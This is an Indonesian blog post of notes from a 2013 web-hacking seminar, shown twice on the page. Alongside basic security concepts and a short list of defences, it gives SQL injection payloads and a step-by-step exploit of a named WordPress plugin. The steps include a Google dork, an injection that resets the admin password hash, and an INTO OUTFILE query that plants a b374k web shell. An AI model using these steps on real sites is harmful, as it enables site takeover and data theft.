Monday, 4 March 2013

Web Hacking X-Code





Oleh    : Zaenab A. Zahra
Teka-Teki Report Password
Web Hacking X-Code 2 Maret 2013
UIN Maulana Malik Ibrahim Malang




Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?
-        Perkembangan komputer
-        Ketergantungan manusia
-        Tuntutan kompleksitas semakin tinggi
-        Keamanan menjadi anak tiri
-        Kemampuan orang disebut hacker menjadi menurun
-        Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum

Terminologi hacker
-        Vulnerability    : mengetahui celah keamanan
-        Threat               : bagaimana cara-cara yang harus dilakukan supaya bisa masuk
-        Attack              : prosees masuk/ membobol keamanannya
-        Exploit             : memanage apa yang harus dilakukan di dalamnya

 Contoh Situs yang menyediakan exploits
-  Metasploit Framework 
 
-   Exploit-db.com 
 
securityfocus.com
Darkc0de.com
packetstormsecurity.org   

 
Element-element keamanan (CIA)
1.    Confidentiality
            Keamanan informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
2.    Integrity / integritas
            Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
-        3.  Availability
            Keamanan informasi data untuk ketersediaan atau keberadaannya


Sebuah program harusnya berada di tengah-tengahnya.



 
Pengelompokkan hacke
  1. Black Hat Hacker
  2. White Hat Hacker
  3. Grey Hat Hacker
  4. Suicide Hacker

Tahapan aktifitas Hacking
-        Reconnaissance
1.     Reconnaissance Passive
- Pencarian data target di google
- Pencarian data target di berbagai jejaring sosial
2.     Reconnaissance Active
- HTTP Fingerprint

-        Scanning, pencarian berdasarkan scanning
- Google.com
- Archive Milw0rm
- Archive Exploit DB
- Metasploit Framework
- Darkc0de

-        Gaining Acces
- Exploitasi Remote Execution pada celah keamanan OS
- Exploitasi Remote Execution pada celah keamanan aplikasi
- Exploitasi Remote Execution pada celah keamanan web

-        Maintaining acces
PHP Backdoor
Simple php shell
R57
C99 / C100
ASP Backdoor
B374K

-        Covering Tracks
- Pembersihan berbagai exploit atau software yang diupload
- Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.


KONSEP
SQL Injection
GET dan POST
-        GET : www.site.com/form.php?nama=zae
-        POST : www.site.com/form.php
IMPLEMENTASI pada method GET & POST
-        Langsung dari URL
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : variable=value

Query
-        $query = “SELECT * FROM contoh WHERE nama =’$username’”;
-        $username = dari GET atau POST
SQL Injection
-        $query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’
-        $query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;
Noobs…


 
DEMO WEB HACKING
Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability

Vulnerability Info
-        Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
-        Version : 2.7.1 - 3.0.1
-        Date : 26-05-2012
-        Google Dork : inurl:/wp-content/plugins/store-locator-le/
-        Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
SQL Injection Vuln



POST Method, Advanced REST Client
-        Method : POST
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : query=[injection]
-        Contoh:
query=SELECT * FROM wp_users
Mengatasi Teka-Teki Hash
UPDATE – replace password
            UPDATE  wp_users SET  user_pass =  '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE  `wp_users`.`ID` =1 LIMIT 1 ;
-        Mengganti password menjadi “Password”
Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+ diganti %2B
Base 64 Encryption
Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)



PENGAMANAN
-        Update CMS, plugin
-        Menggunakan mysql_real_escape_string()
-        Memberikan validasi pada tiap inputan
-        Berikan length limit pada inputan
-        Config database error report
-        Setting php.ini
-        dll 








0 comments:

Post a Comment

Monday, 4 March 2013

Web Hacking X-Code

Posted by Unknown at 20:49




Oleh    : Zaenab A. Zahra
Teka-Teki Report Password
Web Hacking X-Code 2 Maret 2013
UIN Maulana Malik Ibrahim Malang




Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?
-        Perkembangan komputer
-        Ketergantungan manusia
-        Tuntutan kompleksitas semakin tinggi
-        Keamanan menjadi anak tiri
-        Kemampuan orang disebut hacker menjadi menurun
-        Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum

Terminologi hacker
-        Vulnerability    : mengetahui celah keamanan
-        Threat               : bagaimana cara-cara yang harus dilakukan supaya bisa masuk
-        Attack              : prosees masuk/ membobol keamanannya
-        Exploit             : memanage apa yang harus dilakukan di dalamnya

 Contoh Situs yang menyediakan exploits
-  Metasploit Framework 
 
-   Exploit-db.com 
 
securityfocus.com
Darkc0de.com
packetstormsecurity.org   

 
Element-element keamanan (CIA)
1.    Confidentiality
            Keamanan informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
2.    Integrity / integritas
            Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
-        3.  Availability
            Keamanan informasi data untuk ketersediaan atau keberadaannya


Sebuah program harusnya berada di tengah-tengahnya.



 
Pengelompokkan hacke
  1. Black Hat Hacker
  2. White Hat Hacker
  3. Grey Hat Hacker
  4. Suicide Hacker

Tahapan aktifitas Hacking
-        Reconnaissance
1.     Reconnaissance Passive
- Pencarian data target di google
- Pencarian data target di berbagai jejaring sosial
2.     Reconnaissance Active
- HTTP Fingerprint

-        Scanning, pencarian berdasarkan scanning
- Google.com
- Archive Milw0rm
- Archive Exploit DB
- Metasploit Framework
- Darkc0de

-        Gaining Acces
- Exploitasi Remote Execution pada celah keamanan OS
- Exploitasi Remote Execution pada celah keamanan aplikasi
- Exploitasi Remote Execution pada celah keamanan web

-        Maintaining acces
PHP Backdoor
Simple php shell
R57
C99 / C100
ASP Backdoor
B374K

-        Covering Tracks
- Pembersihan berbagai exploit atau software yang diupload
- Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.


KONSEP
SQL Injection
GET dan POST
-        GET : www.site.com/form.php?nama=zae
-        POST : www.site.com/form.php
IMPLEMENTASI pada method GET & POST
-        Langsung dari URL
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : variable=value

Query
-        $query = “SELECT * FROM contoh WHERE nama =’$username’”;
-        $username = dari GET atau POST
SQL Injection
-        $query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’
-        $query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;
Noobs…


 
DEMO WEB HACKING
Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability

Vulnerability Info
-        Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
-        Version : 2.7.1 - 3.0.1
-        Date : 26-05-2012
-        Google Dork : inurl:/wp-content/plugins/store-locator-le/
-        Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
SQL Injection Vuln



POST Method, Advanced REST Client
-        Method : POST
-        Header : Content-Type: application/x-www-form-urlencoded
-        Data : query=[injection]
-        Contoh:
query=SELECT * FROM wp_users
Mengatasi Teka-Teki Hash
UPDATE – replace password
            UPDATE  wp_users SET  user_pass =  '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE  `wp_users`.`ID` =1 LIMIT 1 ;
-        Mengganti password menjadi “Password”
Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+ diganti %2B
Base 64 Encryption
Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)



PENGAMANAN
-        Update CMS, plugin
-        Menggunakan mysql_real_escape_string()
-        Memberikan validasi pada tiap inputan
-        Berikan length limit pada inputan
-        Config database error report
-        Setting php.ini
-        dll 








0 comments on "Web Hacking X-Code "

Post a Comment

 

Catatanku Template by Ipietoon Cute Blog Design